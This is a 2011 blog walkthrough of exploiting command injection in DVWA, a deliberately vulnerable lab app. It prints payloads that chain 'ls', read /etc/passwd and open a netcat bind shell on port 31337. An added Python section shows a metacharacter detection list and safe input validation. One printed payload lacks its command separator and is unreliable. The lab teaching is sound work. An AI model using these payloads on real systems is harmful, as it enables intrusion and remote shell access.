September 3, 2011

Command Execution on DVWA

So, the other day, I started delving into webappsec and I hit a bummer very soon, hence this post.
Getting started in webappsec is not that hard actually; there are tons of resources for that, just Google it.
I think the best way to learn something is by actually doing it. There are many "vulnerable by design" distros and live sites to practice web application hacking on.
In this post I am going to write about DVWA, the Command Execution vulnerability that is present in it, and how to exploit it.
This being the first post regarding DVWA, I will start with the setup and tools required for this part. Let's get started!

Web security dojo
It is a complete distro for web application hackers. It contains various security testing tools and vulnerable web applications built in it so as to provide a complete testing environment for you.
You can visit the homepage here
And download it from here

Damn Vulnerable Web Application
As the name suggests, it is a damn vulnerable web application. You get all top 10 OWASP vulnerabilities in this package for your exploitation pleasure but no prizes for getting a shell because it is designed for that purpose ;)
I am using Web Security Dojo, which has DVWA already installed along with other vulnerable webapps, so there is no need to download it.
If you want to download it and set it up yourself, you can go ahead and get it from here.

Burp suite
It is an integrated platform for performing security testing of web applications. Again, I am using this tool off the 'dojo'.
Download and more: Burp Suite

Figure out how to start DVWA and Burp, and how to have Burp intercept all the traffic between your browser and the web application. It's really easy ;)

That's all we need for this part. Let's get started with Command Execution.

Command Execution is a technique used via a web interface in order to execute OS commands on the web server.
Go to the Command Execution page. We are greeted with a text box and a submit button for a 'ping for free' utility.

Enter an IP address and click on submit. The request will be intercepted by Burp.

So, the app sends the IP address we provided and then calls the submit function.
Next, try providing 127.0.0.1 & ls as input, hoping it will be this easy, but you will be welcomed by this screen as a result:

Try as many variations as you like to sneak in a command to execute. You will see this every time!

Well, that is a bummer! Any modification to the IP address is being caught as invalid! And they said it is an easy demo!
After looking carefully, you will see that the security level is set to high, as shown in the 2nd screenshot.
Let's get introduced to DVWA security then...
DVWA security
DVWA comes with a very nice feature which lets you control the security level of the web app, and it is set to high by default after installation. This feature lets you try your skills against low to highly secured environments. According to the documentation, high security mode is secure against all vulnerabilities and it shows good programming practices. There is a link on each page which shows the source code of each mode, so you can compare secure and insecure practices. Very nice; now change it to low and let us try again...

After you enter an IP and the request is intercepted by Burp, we will modify it on the fly and forward it to the app to see its response.
To modify a request on the fly, open Burp Suite and go to the raw request captured as we have seen earlier. Place the cursor at the end of the IP address and change the content there. We want to append a command to it, and we want it to be URL-encoded so that the & is carried inside the ip parameter instead of splitting the query string. Right click in the window and choose the 'URL-encode as you type' option.
I provided 127.0.0.1[space]&[space]ls&security as input; it should look like this:

Forward this request and return to the browser.
Yay! It is successful!

help
index.php
source
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.008 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.007 ms
That is the directory listing we have been waiting for! So it was this easy after all! After you see successful command execution, do a victory dance and return to your desk. We can do so much with this!
Send in cat /etc/passwd:
ip=127.0.0.0+cat+/etc/passwd
We get:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
<<snip>>
Or read the web.config file, or get a shell?
ip=127.0.0.1+nc+-l+-p+31337+-e+/bin/sh&submit=submit

Connect to port 31337 and enjoy :)
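The low-security handler accepted everything after the address because the whole ip parameter reached a shell, and the high-security one refused anything that was not an address. As an added example (not DVWA's own code), here is the same form body decoded the way the server sees it, showing why the %26 encoding mattered above, next to the strict check and shell-free invocation that the high mode is meant to illustrate; the request bodies are constructed after the post's Burp screenshots.

```python
import ipaddress
import subprocess
from urllib.parse import parse_qs

# Constructed form bodies modelled on the post's requests (not captured traffic).
RAW_AMPERSAND = "ip=127.0.0.1+&+ls&submit=submit"       # '&' typed without URL-encoding
ENCODED_AMPERSAND = "ip=127.0.0.1+%26+ls&submit=submit"  # Burp's 'URL-encode as you type'
CLEAN = "ip=127.0.0.1&submit=submit"

# Characters that let a shell start a second command; useful for reviewing request logs.
SHELL_META = set("&|;`$()<>\n")


def ip_param(body: str) -> str:
    """Return the 'ip' field exactly as the application sees it after decoding."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("ip", [""])[0]


def has_shell_metachar(value: str) -> bool:
    """Detection helper: flag a decoded parameter that carries shell metacharacters."""
    return any(ch in SHELL_META for ch in value)


def unsafe_command(target: str) -> str:
    """The low-security pattern: user input concatenated into a shell command line.
    Returned as a string only to make the injection point visible; never run it."""
    return "ping -c 3 " + target


def validate_target(target: str) -> str:
    """The high-security pattern: accept only a literal IPv4/IPv6 address."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError(f"rejected non-address input: {target!r}")


def safe_argv(target: str) -> list:
    """argv for subprocess with shell=False, so no shell ever parses the input."""
    return ["ping", "-c", "3", validate_target(target)]


def run_ping(target: str) -> str:
    """Validated, shell-free ping; raises ValueError on anything but an address."""
    return subprocess.run(safe_argv(target), capture_output=True, text=True).stdout
```

With the raw body, the unencoded & splits the query string, so ls becomes a separate parameter and never reaches the ip field; only the encoded body delivers "127.0.0.1 & ls" to the handler, and the strict check rejects it.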

It was really a basic thing, but I have written a huge post; hope my blog will get some hits ;)

2 comments:

  1. Nice work mate, I have become increasingly interested in web app security (seeing as XSS is the most common vulnerability). Keep posting :)
  2. I like this creative work. This is very useful app for the purpose of security. custom web application development